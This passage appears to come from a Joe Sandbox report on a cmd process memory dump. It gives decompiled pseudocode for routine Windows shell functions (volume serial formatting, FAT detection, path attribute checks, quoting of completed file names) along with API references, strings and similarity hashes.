0x001daa0c
0x001daa13
0x001daa14
0x00000000
0x001daa1a
0x001da9f9

APIs

memset.MSVCRT ref: 001DA879
memset.MSVCRT ref: 001DA8A1
memset.MSVCRT ref: 001DA8C9

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,001B21E8,?,?,?,-00000105,-00000105,-00000105), ref: 001DA9F1
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 001DA9FB
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 001DAA0D
??_V@YAXPAX@Z.MSVCRT ref: 001DAB45
??_V@YAXPAX@Z.MSVCRT ref: 001DAB52
??_V@YAXPAX@Z.MSVCRT ref: 001DAB5F

Strings

%04X-%04X, xrefs: 001DAAFC

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$ErrorLast$InformationVolume
String ID: %04X-%04X
API String ID: 2748242238-1126166780
Opcode ID: 8191ffedca2f29bc60af1da5266c60c49f7b281d867cdc2c7ebcdaa9e45321aa
Instruction ID: 8baf46bafd142fb9456c0dcb9338c49b110a768ae1ea9db4881bf92bf2c74d6e
Opcode Fuzzy Hash: 8191ffedca2f29bc60af1da5266c60c49f7b281d867cdc2c7ebcdaa9e45321aa
Instruction Fuzzy Hash: 5091B2B1A012289BDB24DB64CC85BEA77B9EF64354F8401DAF509E3240EB349F85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001C3121 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E001C3121(void* __ecx, void* __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				long _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1092;
				char _v1096;
				void* _v1100;
				void _v1620;
				long _v1624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				WCHAR* _t64;
				WCHAR* _t84;
				signed int _t86;
				void* _t87;
				WCHAR* _t89;
				WCHAR* _t102;
				void* _t110;
				void* _t111;
				signed int _t112;

				_t109 = __edx;
				_t47 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t47 ^ _t112;
				_v560 = 1;
				_t89 = 0;
				_v556 = 0x104;
				_v564 = 0;
				_t111 = __edx;
				_t110 = __ecx;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_v1100 = 0;
				_v1096 = 1;
				_v1092 = 0x104;
				memset( &_v1620, 0, 0x104);
				if(E001C0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E001C0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E001C0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					 *0x1f3cf0 = 8;
					_t64 = _t89;
					goto L21;
				} else {
					_t79 = _v1100;
					 *0x1f3cf0 = 0;
					if(_v1100 == 0) {
						_t79 =  &_v1620;
					}
					_t109 = _t111;
					if(E001C4C89(_t110, _t111, _t79, _v1092) != 0) {
						_t81 = _v1100;
						if(_v1100 == 0) {
							_t81 =  &_v1620;
						}
						E001C0D89(_t109, _t81);
						E001C0CF2(_t109, "\\");
						_t102 = _v564;
						if(_t102 == 0) {
							_t102 =  &_v1084;
						}
						_t84 = _v28;
						if(_t84 == 0) {
							_t84 =  &_v548;
						}
						if(GetVolumeInformationW(_t84, _t89, _t89, _t89,  &_v1624, _t89, _t102, _v556) == 0) {
							_t86 = GetLastError();
							_t46 = _t86 - 0x90; // -144
							asm("sbb ecx, ecx");
							 *0x1f3cf0 =  ~_t46 & _t86;
						} else {
							_t87 = _v564;
							if(_t87 == 0) {
								_t87 =  &_v1084;
							}
							__imp___wcsicmp(_t87, L"FAT");
							if(_t87 == 0) {
								if(_v1624 == 0xc) {
									_t64 = 1;
									L21:
									_t89 = _t64;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z(_v1100);
				__imp__??_V@YAXPAX@Z(_v28);
				__imp__??_V@YAXPAX@Z();
				return E001C6FD0(_t89, _t89, _v8 ^ _t112, _t109, _t110, _t111, _v564);
			}

0x001c3121
0x001c312c
0x001c3133
0x001c313e
0x001c3146
0x001c3148
0x001c3154
0x001c315c
0x001c315e
0x001c3160
0x001c3168
0x001c3170
0x001c3174
0x001c3180
0x001c3188
0x001c3193
0x001c319a
0x001c31a9
0x001c31d5
0x001cdbf0
0x001cdbfa
0x00000000
0x001c3229
0x001c3229
0x001c322f
0x001c3237
0x001c3239
0x001c3239
0x001c3245
0x001c3251
0x001c3257
0x001c325f
0x001c3261
0x001c3261
0x001c326e
0x001c327e
0x001c3283
0x001c328b
0x001cdbb6
0x001cdbb6
0x001c3291
0x001c3296
0x001c3310
0x001c3310
0x001c32b3
0x001cdbd3
0x001cdbd9
0x001cdbe1
0x001cdbe5
0x001c32b9
0x001c32b9
0x001c32c1
0x001c3318
0x001c3318
0x001c32c9
0x001c32d3
0x001cdbc8
0x001cdbd0
0x001cdbfc
0x001cdbfc
0x001cdbfc
0x001cdbc8
0x001c32d3
0x001c32b3
0x001c3251
0x001c32df
0x001c32e9
0x001c32f6
0x001c330f

APIs

memset.MSVCRT ref: 001C3160
memset.MSVCRT ref: 001C3180
memset.MSVCRT ref: 001C31A9

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,00000000,?,?,001B21E8,?,?,?,-00000105,-00000105,-00000105), ref: 001C32AB
_wcsicmp.MSVCRT ref: 001C32C9
??_V@YAXPAX@Z.MSVCRT ref: 001C32DF
??_V@YAXPAX@Z.MSVCRT ref: 001C32E9
??_V@YAXPAX@Z.MSVCRT ref: 001C32F6

Strings

FAT, xrefs: 001C32C3

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$InformationVolume_wcsicmp
String ID: FAT
API String ID: 4247940253-238207945
Opcode ID: c4982c2553463f21c916444c1f81823def3f66286501825b397d5def0681f706
Instruction ID: 3b7e8d17fa98d8d5af8aff9743840cc0b28e6a4761b5e1b5497202fc9ea627e9
Opcode Fuzzy Hash: c4982c2553463f21c916444c1f81823def3f66286501825b397d5def0681f706
Instruction Fuzzy Hash: 8C512CB19002599AEB149BA4DC89FEAB7B8EB24344F0401EEE519E3151EB35DE84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 001BAD44 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E001BAD44(WCHAR* __ecx) {
				signed int _v8;
				void* _v608;
				long _v612;
				char _v616;
				int _v620;
				void* _v624;
				void _v1140;
				WCHAR* _v1144;
				WCHAR* _v1148;
				void* _v1152;
				void* _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t34;
				WCHAR* _t45;
				int _t48;
				wchar_t* _t49;
				long _t50;
				intOrPtr* _t51;
				signed int _t57;
				void* _t59;
				void* _t60;
				signed int _t61;
				WCHAR* _t62;
				void* _t78;
				void* _t81;
				signed int _t82;
				WCHAR* _t84;
				void* _t85;
				WCHAR* _t86;
				wchar_t* _t87;
				signed int _t89;
				signed int _t91;

				_t91 = (_t89 & 0xfffffff8) - 0x47c;
				_t32 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t32 ^ _t91;
				_push(_t59);
				_t84 = __ecx;
				_v1144 = __ecx;
				if(__ecx == 0) {
					_t34 = 0;
					L11:
					_pop(_t81);
					_pop(_t85);
					_pop(_t60);
					return E001C6FD0(_t34, _t60, _v8 ^ _t91, _t79, _t81, _t85);
				}
				_v616 = 1;
				_t82 = 0;
				_v612 = 0x104;
				_v620 = 0;
				memset( &_v1140, 0, 0x104);
				_t91 = _t91 + 0xc;
				if(E001C0C70( &_v1140, ((0 | _v616 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L10:
					__imp__??_V@YAXPAX@Z(_v620);
					_t34 = _t82;
					goto L11;
				}
				_t45 = _v620;
				if(_t45 == 0) {
					_t45 =  &_v1140;
				}
				_t61 = GetFullPathNameW(E001C22C0(_t59, _t84), _v612, _t45,  &_v1148);
				if(_t61 == 0) {
					L9:
					_t82 = _t61;
					goto L10;
				} else {
					_t86 = _v620;
					if(_t86 == 0) {
						_t86 =  &_v1140;
					}
					_t48 = wcsncmp(_t86, L"\\\\.\\", 4);
					_t91 = _t91 + 0xc;
					if(_t48 == 0) {
						_t62 = _v1144;
						_t87 =  &(_t86[4]);
						_v1148 = _t87;
						_t49 = wcsstr(_t62, _t87);
						_v1148 = _t49;
						if(_t49 == 0 || _t49 <= _t62) {
							_t50 = GetFileAttributesW(_t62);
						} else {
							 *_t49 = 0;
							_t50 = GetFileAttributesW(_t62);
							 *_v1148 =  *_t49 & 0x0000ffff;
						}
						if(_t50 != 0xffffffff) {
							_t82 = _t50;
						}
						goto L10;
					} else {
						_t51 = _v1148;
						if(_t51 == 0 ||  *_t51 == _t82) {
							_t61 = 0 | GetFileAttributesW(_t86) != 0xffffffff;
						} else {
							_t79 = _t86;
							_t61 = E001C68BA(E001C6A00, _t86, 0x37, _t82, _t91 + 0x234,  &_v1144) & 0x000000ff;
							E001BCD27( *((intOrPtr*)(_t91 + 0x14)));
							if(_t61 == 0) {
								_t57 = _t86[1] & 0x0000ffff;
								_t78 = 0x5c;
								if(_t57 == _t78 || _t57 == 0x3a && _t86[2] == _t78 && _t86[3] == _t82) {
									if(GetDriveTypeW(_t86) > 1) {
										_t61 = 1;
									}
								}
							}
						}
						goto L9;
					}
				}
			}

0x001bad4c
0x001bad52
0x001bad59
0x001bad60
0x001bad62
0x001bad64
0x001bad6b
0x001baeac
0x001bae71
0x001bae78
0x001bae79
0x001bae7a
0x001bae85
0x001bae85
0x001bad76
0x001bad7f
0x001bad81
0x001bad8c
0x001bad95
0x001bada0
0x001badc0
0x001bae61
0x001bae68
0x001bae6f
0x00000000
0x001bae6f
0x001badc6
0x001badcf
0x001d122a
0x001d122a
0x001badf0
0x001badf4
0x001bae5f
0x001bae5f
0x00000000
0x001badf6
0x001badf6
0x001badff
0x001d1233
0x001d1233
0x001bae0d
0x001bae13
0x001bae18
0x001d123c
0x001d1240
0x001d1245
0x001d1249
0x001d124f
0x001d1257
0x001d1276
0x001d125d
0x001d1263
0x001d1266
0x001d1270
0x001d1270
0x001d127f
0x001d1285
0x001d1285
0x00000000
0x001bae1e
0x001bae1e
0x001bae24
0x001d12b0
0x001bae33
0x001bae37
0x001bae53
0x001bae56
0x001bae5d
0x001bae86
0x001bae8c
0x001bae90
0x001d1296
0x001d129e
0x001d129e
0x001d1296
0x001bae90
0x001bae5d
0x00000000
0x001bae24
0x001bae18

APIs

memset.MSVCRT ref: 001BAD95

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,00000000,?,00000001), ref: 001BADEA
wcsncmp.MSVCRT(?,\\.\,00000004), ref: 001BAE0D
??_V@YAXPAX@Z.MSVCRT ref: 001BAE68
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000037,00000000,?,?), ref: 001D128D

Part of subcall function 001C22C0: wcschr.MSVCRT ref: 001C22CC

wcsstr.MSVCRT ref: 001D1249
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001D1266
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001D12A5

Part of subcall function 001C68BA: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,001C6A00,001C6A00,?,001BAE4F,00000037,00000000,?), ref: 001C68E6

Part of subcall function 001BCD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,001D9362,00000000,00000000,?,001C9814,00000000), ref: 001BCD55

Strings

\\.\, xrefs: 001BAE07

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: File$AttributesFindmemset$CloseDriveFirstFullNamePathTypewcschrwcsncmpwcsstr
String ID: \\.\
API String ID: 52035941-2900601889
Opcode ID: 782c82a8eb576484f6495d10922293bd0dead847d6e34c31db5440af0f4b47a5
Instruction ID: 6e4223704af3d8500f1e376ab6dd8fff30860e9260334c83354cc5ad56bd6be0
Opcode Fuzzy Hash: 782c82a8eb576484f6495d10922293bd0dead847d6e34c31db5440af0f4b47a5
Instruction Fuzzy Hash: 0B41F571508301ABD730AF64E884AABB7E8EF94710F51091EF895C7291EB30DD48C7A7

Uniqueness

Uniqueness Score: -1.00%

Function 001DAEE5 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 337
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E001DAEE5(void* __ecx, void* __eflags, signed int _a4, int _a8) {
				signed int _v8;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* _v66;
				intOrPtr _v70;
				intOrPtr _v74;
				intOrPtr _v78;
				intOrPtr _v82;
				intOrPtr _v86;
				intOrPtr _v90;
				intOrPtr _v94;
				intOrPtr _v98;
				short _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				signed char _v125;
				signed int _v132;
				int _v136;
				signed int _v140;
				signed short* _v144;
				void* _v148;
				signed int _v152;
				int _v156;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t96;
				signed int _t105;
				void* _t111;
				long _t113;
				void* _t115;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				void* _t126;
				void* _t129;
				signed int _t138;
				void _t142;
				long _t144;
				long _t146;
				signed short* _t154;
				void* _t157;
				signed short _t164;
				signed int _t171;
				signed int _t173;
				signed char _t177;
				signed char _t179;
				long _t180;
				int _t185;
				void* _t188;
				signed int _t191;
				void* _t192;
				void* _t193;
				signed int* _t194;
				int _t197;
				signed short* _t198;
				void* _t199;
				int _t200;
				signed short* _t203;
				intOrPtr _t204;
				signed int _t205;
				void* _t206;

				_t96 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t96 ^ _t205;
				_t154 = __ecx;
				_v148 = __ecx;
				_v136 = _a8;
				_v108 = 0;
				_v100 = 0;
				_v124 = 0;
				_v120 = 0;
				_v116 = 0;
				_v112 = 0;
				_v104 = 0;
				_v98 = 0;
				_v94 = 0;
				_v90 = 0;
				_v86 = 0;
				_v82 = 0;
				_v78 = 0;
				_v74 = 0;
				_v70 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E001DB4DD(0);
				_t157 = 0x2c;
				_t191 = E001C00B0(_t157);
				if(_t191 == 0) {
					E001D9287(_t157);
					__imp__longjmp(0x1eb8b8, 1);
				}
				_t187 =  &_v124;
				 *((intOrPtr*)(_t191 + 8)) = 0x800;
				asm("sbb esi, esi");
				_t197 =  ~_a4 & 0x00000010;
				E001BCB48( &_v124);
				_t159 = _v48;
				if(_v48 == 0 || E001C3B5D(_t159,  &_v124) == 1) {
					L57:
					E001C5D39();
					_t105 = 0;
				} else {
					_t187 = 0;
					if(E001C4800( &_v124, 0, 1,  &_v132) == 1) {
						goto L57;
					} else {
						_t187 = _t191;
						_t197 = _v132;
						_t111 = E001C5590(_t197, _t191, _t197, _t197, 0, 0, 0, 0, 0, 0);
						if(_t111 != 0) {
							goto L57;
						} else {
							if( *(_t197 + 0x14) != _t111) {
								qsort( *(_t197 + 0x1c),  *(_t197 + 0x14), 4, E001D9C40);
								_t206 = _t206 + 0x10;
							}
							_t164 = 0x22;
							_t198 = _t154;
							_v125 = 0;
							_t191 = 0;
							_t187 = 2;
							while(1) {
								_t113 =  *_t198 & 0x0000ffff;
								if(_t113 == 0) {
									break;
								}
								if(_t113 != _t164) {
									if(wcschr(L" &()[]{}^=;!%\'+,`~", _t113) != 0) {
										_v125 = 1;
									}
									_t187 = 2;
									 *_t154 =  *_t198;
									_t164 = 0x22;
									goto L18;
								} else {
									_t185 = _v136;
									_t191 = _t191 + _t187;
									_v125 = 1;
									_t198 = _t198 + _t187;
									if(_t185 >= _t191 >> 1) {
										_v136 = _t185 - 1;
									}
									_t164 = 0x22;
									if( *_t198 == _t164) {
										 *_t154 = _t164;
										L18:
										_t154 = _t154 + _t187;
										_t198 = _t198 + _t187;
										_t191 = _t191 + _t187;
									}
								}
								if((_t191 & 0xfffffffe) < 0x4000) {
									continue;
								}
								break;
							}
							 *_t154 = 0;
							_t154 = _v132;
							_t197 = _t154[0xa];
							_v156 = _t197;
							_t115 = calloc(4, _t197);
							 *0x1f853c = _t115;
							if(_t115 == 0) {
								goto L57;
							} else {
								_v140 = 0;
								_t191 = 0;
								_v132 = 0;
								if(_t197 > 0) {
									do {
										_t187 = ".";
										_t171 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
										_t122 = _t171;
										while(1) {
											_t197 =  *_t122;
											if(_t197 !=  *_t187) {
												break;
											}
											if(_t197 == 0) {
												L27:
												_t123 = 0;
											} else {
												_t197 =  *((intOrPtr*)(_t122 + 2));
												_t53 = _t187 + 2; // 0x200000
												if(_t197 !=  *_t53) {
													break;
												} else {
													_t122 = _t122 + 4;
													_t187 = _t187 + 4;
													if(_t197 != 0) {
														continue;
													} else {
														goto L27;
													}
												}
											}
											L29:
											if(_t123 != 0) {
												_t187 = L"..";
												_t124 = _t171;
												while(1) {
													_t199 =  *_t124;
													if(_t199 !=  *_t187) {
														break;
													}
													if(_t199 == 0) {
														L35:
														_t197 = 0;
														_t125 = 0;
													} else {
														_t204 =  *((intOrPtr*)(_t124 + 2));
														_t55 = _t187 + 2; // 0x2e
														if(_t204 !=  *_t55) {
															break;
														} else {
															_t124 = _t124 + 4;
															_t187 = _t187 + 4;
															if(_t204 != 0) {
																continue;
															} else {
																goto L35;
															}
														}
													}
													L37:
													if(_t125 != 0) {
														_t188 = _t171 + 2;
														do {
															_t126 =  *_t171;
															_t171 = _t171 + 2;
														} while (_t126 != _t197);
														_t197 = _v136;
														_t173 = _t171 - _t188 >> 1;
														_v152 = _t173;
														_t129 = calloc(_t197 + 4 + _t173, 2);
														_t187 =  *0x1f853c;
														 *(_t187 + _v140 * 4) = _t129;
														if(_t129 != 0) {
															_t177 = _v125;
															if(_t177 != 0) {
																_v144 = 0;
															} else {
																_t203 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
																_v144 = _t203;
																_t144 =  *_t203 & 0x0000ffff;
																if(_t144 != 0) {
																	_t180 = _t144;
																	do {
																		if(wcschr(L" &()[]{}^=;!%\'+,`~", _t180) != 0) {
																			_v125 = 1;
																		}
																		_t203 =  &(_t203[1]);
																		_t146 =  *_t203 & 0x0000ffff;
																		_t180 = _t146;
																	} while (_t146 != 0);
																	_t177 = _v125;
																	_t187 =  *0x1f853c;
																	_v144 = _t203;
																}
																_t197 = _v136;
															}
															_t192 =  *(_t187 + _v140 * 4);
															if(_t177 != 0) {
																_t142 = 0x22;
																 *_t192 = _t142;
																_t192 = _t192 + 2;
															}
															_t200 = _t197 + _t197;
															memcpy(_t192, _v148, _t200);
															_t193 = _t192 + _t200;
															_t197 = _v152 + _v152;
															memcpy(_t193,  *((intOrPtr*)(_t154[0xe] + _v132 * 4)) + 0x30, _t197);
															_t179 = _v125;
															_t206 = _t206 + 0x18;
															_t194 = _t193 + _t197;
															if(_t179 != 0) {
																_t138 = 0x22;
																 *_t194 = _t138;
																_t194 =  &(_t194[0]);
																_v125 = (_t138 & 0xffffff00 | _v144 != 0x00000000) - 0x00000001 & _t179;
															}
															_v140 = _v140 + 1;
															 *_t194 = 0;
															_t191 = _v132;
														}
													}
													goto L54;
												}
												asm("sbb eax, eax");
												_t125 = _t124 | 0x00000001;
												_t197 = 0;
												goto L37;
											}
											goto L54;
										}
										asm("sbb eax, eax");
										_t123 = _t122 | 0x00000001;
										goto L29;
										L54:
										_t191 = _t191 + 1;
										_v132 = _t191;
									} while (_t191 < _v156);
								}
								E001C0040(_t154[0xc]);
								E001C0040(_t154[2]);
								E001C0040(_t154);
								E001C5D39();
								_t105 = _v140;
							}
						}
					}
				}
				return E001C6FD0(_t105, _t154, _v8 ^ _t205, _t187, _t191, _t197);
			}

0x001daef0
0x001daef7
0x001daefd
0x001daeff
0x001daf08
0x001daf10
0x001daf15
0x001daf19
0x001daf1c
0x001daf1f
0x001daf22
0x001daf25
0x001daf28
0x001daf2b
0x001daf2e
0x001daf31
0x001daf34
0x001daf37
0x001daf3a
0x001daf3d
0x001daf43
0x001daf44
0x001daf45
0x001daf46
0x001daf4a
0x001daf50
0x001daf53
0x001daf56
0x001daf59
0x001daf5c
0x001daf5f
0x001daf62
0x001daf63
0x001daf64
0x001daf65
0x001daf6c
0x001daf72
0x001daf76
0x001daf78
0x001daf84
0x001daf84
0x001daf8d
0x001daf92
0x001daf9b
0x001daf9d
0x001dafa0
0x001dafa5
0x001dafaa
0x001db2a5
0x001db2a5
0x001db2aa
0x001dafbe
0x001dafc1
0x001dafd1
0x00000000
0x001dafd7
0x001dafd9
0x001dafe3
0x001dafe8
0x001dafef
0x00000000
0x001daff5
0x001daff8
0x001db007
0x001db00d
0x001db00d
0x001db012
0x001db015
0x001db019
0x001db01c
0x001db01e
0x001db01f
0x001db01f
0x001db025
0x00000000
0x00000000
0x001db02a
0x001db066
0x001db068
0x001db068
0x001db071
0x001db074
0x001db077
0x00000000
0x001db02c
0x001db02c
0x001db032
0x001db036
0x001db03c
0x001db040
0x001db043
0x001db043
0x001db04b
0x001db04f
0x001db051
0x001db078
0x001db078
0x001db07a
0x001db07c
0x001db07c
0x001db04f
0x001db088
0x00000000
0x00000000
0x00000000
0x001db088
0x001db08c
0x001db08f
0x001db092
0x001db098
0x001db09e
0x001db0a4
0x001db0ad
0x00000000
0x001db0b3
0x001db0b5
0x001db0bb
0x001db0bd
0x001db0c2
0x001db0c8
0x001db0cb
0x001db0d3
0x001db0d6
0x001db0d8
0x001db0d8
0x001db0de
0x00000000
0x00000000
0x001db0e3
0x001db0fa
0x001db0fa
0x001db0e5
0x001db0e5
0x001db0e9
0x001db0ed
0x00000000
0x001db0ef
0x001db0ef
0x001db0f2
0x001db0f8
0x00000000
0x00000000
0x00000000
0x00000000
0x001db0f8
0x001db0ed
0x001db103
0x001db105
0x001db10b
0x001db110
0x001db112
0x001db112
0x001db118
0x00000000
0x00000000
0x001db11d
0x001db134
0x001db134
0x001db136
0x001db11f
0x001db11f
0x001db123
0x001db127
0x00000000
0x001db129
0x001db129
0x001db12c
0x001db132
0x00000000
0x00000000
0x00000000
0x00000000
0x001db132
0x001db127
0x001db141
0x001db143
0x001db149
0x001db14c
0x001db14c
0x001db14f
0x001db152
0x001db157
0x001db15f
0x001db163
0x001db16f
0x001db175
0x001db183
0x001db188
0x001db18e
0x001db193
0x001db29a
0x001db199
0x001db19f
0x001db1a2
0x001db1a8
0x001db1ae
0x001db1b0
0x001db1b2
0x001db1c2
0x001db1c4
0x001db1c4
0x001db1c8
0x001db1cb
0x001db1ce
0x001db1d0
0x001db1d5
0x001db1d8
0x001db1de
0x001db1de
0x001db1e4
0x001db1e4
0x001db1f0
0x001db1f5
0x001db1f9
0x001db1fa
0x001db1fd
0x001db1fd
0x001db200
0x001db20a
0x001db218
0x001db220
0x001db22b
0x001db230
0x001db233
0x001db236
0x001db23a
0x001db23e
0x001db23f
0x001db242
0x001db253
0x001db253
0x001db258
0x001db25e
0x001db261
0x001db261
0x001db188
0x00000000
0x001db143
0x001db13a
0x001db13c
0x001db13f
0x00000000
0x001db13f
0x00000000
0x001db105
0x001db0fe
0x001db100
0x00000000
0x001db264
0x001db264
0x001db265
0x001db268
0x001db0c8
0x001db277
0x001db27f
0x001db286
0x001db28b
0x001db290
0x001db290
0x001db0ad
0x001dafef
0x001dafd1
0x001db2bc

APIs

Part of subcall function 001DB4DD: free.MSVCRT(?,0000000A,00000000,?,001D35C4), ref: 001DB4FB
Part of subcall function 001DB4DD: free.MSVCRT(?,0000000A,00000000,?,001D35C4), ref: 001DB508

Part of subcall function 001C00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000), ref: 001C00C1
Part of subcall function 001C00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000,?), ref: 001C00C8

longjmp.MSVCRT(001EB8B8,00000001,00000000,?,00000000), ref: 001DAF84
qsort.MSVCRT ref: 001DB007
wcschr.MSVCRT ref: 001DB05C
calloc.MSVCRT ref: 001DB09E
calloc.MSVCRT ref: 001DB16F
wcschr.MSVCRT ref: 001DB1B8
memcpy.MSVCRT ref: 001DB20A
memcpy.MSVCRT ref: 001DB22B

Strings

&()[]{}^=;!%'+,`~, xrefs: 001DB057, 001DB1B3

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
String ID: &()[]{}^=;!%'+,`~
API String ID: 975110957-381716982
Opcode ID: 32ae2723bb580dd27a0c33aae2f418d134f734b5a94cc027f5b7f7f504b0c526
Instruction ID: 9a6c05a0554e2939c31421ea44e3a47b35cf20bd81089be147556038098380a1
Opcode Fuzzy Hash: 32ae2723bb580dd27a0c33aae2f418d134f734b5a94cc027f5b7f7f504b0c526
Instruction Fuzzy Hash: 5CC1B076A08214DBDB249F68DC81BAEB7B1FF58710F16406EE849E7342EB30AD45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 001D3CC7 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
timeCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E001D3CC7(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v34;
				short _v36;
				char _v40;
				char _v72;
				char _v604;
				struct _SYSTEMTIME _v620;
				signed int _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t48;
				signed int _t50;
				short* _t55;
				void* _t61;
				intOrPtr _t67;
				signed int* _t78;
				signed int _t87;
				intOrPtr* _t88;
				short* _t96;
				signed int _t101;
				intOrPtr* _t103;
				void* _t108;
				void* _t110;
				signed int _t115;
				void* _t118;
				signed int _t119;
				signed int* _t120;
				short* _t122;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				void* _t128;
				void* _t129;

				_t38 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t38 ^ _t127;
				_t124 = __edx;
				_t88 = __ecx;
				if(__edx != 0) {
					_t91 =  &_v34;
					_v40 = 0x2e003a;
					_v36 =  *0x1df81c;
					E001C1040( &_v34, 0xd, 0x1df7fc);
					goto L10;
				} else {
					_t122 = __edx + 0x10;
					_t120 =  &_v40;
					_t110 = L"/-." - _t120;
					while(_t122 + 0x7fffffee != 0) {
						_t87 =  *(_t110 + _t120) & 0x0000ffff;
						if(_t87 == 0) {
							break;
						}
						 *_t120 = _t87;
						_t120 =  &(_t120[0]);
